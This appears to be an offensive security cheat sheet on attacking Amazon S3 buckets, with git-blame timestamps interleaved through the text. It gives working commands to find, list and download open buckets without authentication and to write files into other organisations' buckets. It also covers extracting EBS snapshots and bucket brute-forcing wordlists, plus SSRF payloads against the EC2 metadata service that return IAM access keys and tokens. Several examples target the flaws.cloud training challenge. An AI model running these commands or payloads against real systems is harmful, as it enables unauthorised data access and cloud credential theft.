2016-11-11 09:03:35 +00:00
# Amazon Bucket S3 AWS
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
Prerequisites, at least you need awscli
2018-08-12 21:30:22 +00:00
```bash
2017-06-18 16:42:12 +00:00
sudo apt install awscli
```
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
You can get your credential here https://console.aws.amazon.com/iam/home?#/security_credential
but you need an aws account, free tier account : https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/
2018-08-12 21:30:22 +00:00
```javascript
2017-06-18 16:42:12 +00:00
aws configure
AWSAccessKeyId=[ENTER HERE YOUR KEY]
AWSSecretKey=[ENTER HERE YOUR KEY]
```
2018-08-12 21:30:22 +00:00
```javascript
2017-06-18 16:42:12 +00:00
aws configure --profile nameofprofile
```
then you can use *--profile nameofprofile* in the aws command
By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
2018-08-12 21:30:22 +00:00
```bash
2016-11-11 09:03:35 +00:00
http://s3.amazonaws.com/[bucket_name]/
http://[bucket_name].s3.amazonaws.com/
2017-06-18 16:42:12 +00:00
http://flaws.cloud.s3.amazonaws.com/
2016-11-11 09:03:35 +00:00
```
2018-10-20 15:03:13 +00:00
Their names are also listed if the listing is enabled.
```xml
< ListBucketResult xmlns = "http://s3.amazonaws.com/doc/2006-03-01/" >
< Name > adobe-REDACTED-REDACTED-REDACTED< / Name >
```
2018-11-24 12:49:08 +00:00
Alternatively you can extract the name of inside-site s3 bucket with `%C0` . (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
```xml
http://example.com/resources/id%C0
eg: http://redacted/avatar/123%C0
```
2017-06-18 16:42:12 +00:00
## Basic test - Listing the files
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
```bash
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2
2016-11-11 09:03:35 +00:00
```
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
You can get the region with a dig and nslookup
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
```bash
$ dig flaws.cloud
;; ANSWER SECTION:
2018-08-12 21:30:22 +00:00
flaws.cloud. 5 IN A 52.218.192.11
2016-11-11 09:03:35 +00:00
2017-06-18 16:42:12 +00:00
$ nslookup 52.218.192.11
Non-authoritative answer:
2018-08-12 21:30:22 +00:00
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
2017-06-18 16:42:12 +00:00
```
## Move a file into the bucket
2018-08-12 21:30:22 +00:00
2018-10-20 15:03:13 +00:00
```bash
aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
aws s3 cp login.html s3://$bucketName --grants read=uri=http://acs.amazonaws.com/groups/global/AllUsers
```
2018-08-12 21:30:22 +00:00
```bash
2016-11-11 09:03:35 +00:00
aws s3 mv test.txt s3://hackerone.marketing
FAIL : "move failed: ./test.txt to s3://hackerone.marketing/test.txt A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."
aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
```
2017-06-18 16:42:12 +00:00
## Download every things (in an open bucket)
2018-08-12 21:30:22 +00:00
```powershell
2017-06-18 16:42:12 +00:00
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
2017-06-05 12:57:28 +00:00
```
2017-07-31 22:37:04 +00:00
## Check bucket disk size (authenticated) use, --no-sign for un-authenticated
2018-08-12 21:30:22 +00:00
```powershell
2017-07-31 22:37:04 +00:00
aws s3 ls s3://< bucketname > --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
```
2017-06-18 16:42:12 +00:00
## AWS - Extract Backup
2018-08-12 21:30:22 +00:00
```powershell
2017-06-18 16:42:12 +00:00
aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",
aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
"SnapshotId": "snap-XXXX342abd1bdcb89",
Create a volume using snapshot
aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
In Aws Console -> EC2 -> New Ubuntu
chmod 400 YOUR_KEY.pem
ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
Mount the volume
lsblk
sudo file -s /dev/xvda1
sudo mount /dev/xvda1 /mnt
```
## Bucket informations
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
2018-08-12 21:30:22 +00:00
```powershell
2017-06-18 16:42:12 +00:00
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyID, SecretAccessKey, and Token
2018-11-13 22:25:18 +00:00
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
2017-06-18 16:42:12 +00:00
```
2018-08-12 21:30:22 +00:00
2017-06-18 16:42:12 +00:00
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
## Bucket Finder
2018-08-12 21:30:22 +00:00
2016-11-11 09:03:35 +00:00
A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
2018-08-12 21:30:22 +00:00
```powershell
2016-11-11 09:03:35 +00:00
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words
US Standard = http://s3.amazonaws.com
Ireland = http://s3-eu-west-1.amazonaws.com
Northern California = http://s3-us-west-1.amazonaws.com
Singapore = http://s3-ap-southeast-1.amazonaws.com
Tokyo = http://s3-ap-northeast-1.amazonaws.com
./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words
```
2018-08-12 21:30:22 +00:00
2016-11-11 09:03:35 +00:00
Use a custom wordlist for the bucket finder, can be created with
2018-08-12 21:30:22 +00:00
```powershell
2016-11-11 09:03:35 +00:00
List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2016-11-11 09:03:35 +00:00
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
* https://digi.ninja/projects/bucket_finder.php
2017-06-05 12:57:28 +00:00
* [Bug Bounty Survey - AWS Basic test ](https://twitter.com/bugbsurveys/status/859389553211297792 )
2017-06-18 16:42:12 +00:00
* [FlAWS.cloud Challenge based on AWS vulnerabilities ](http://flaws.cloud/ )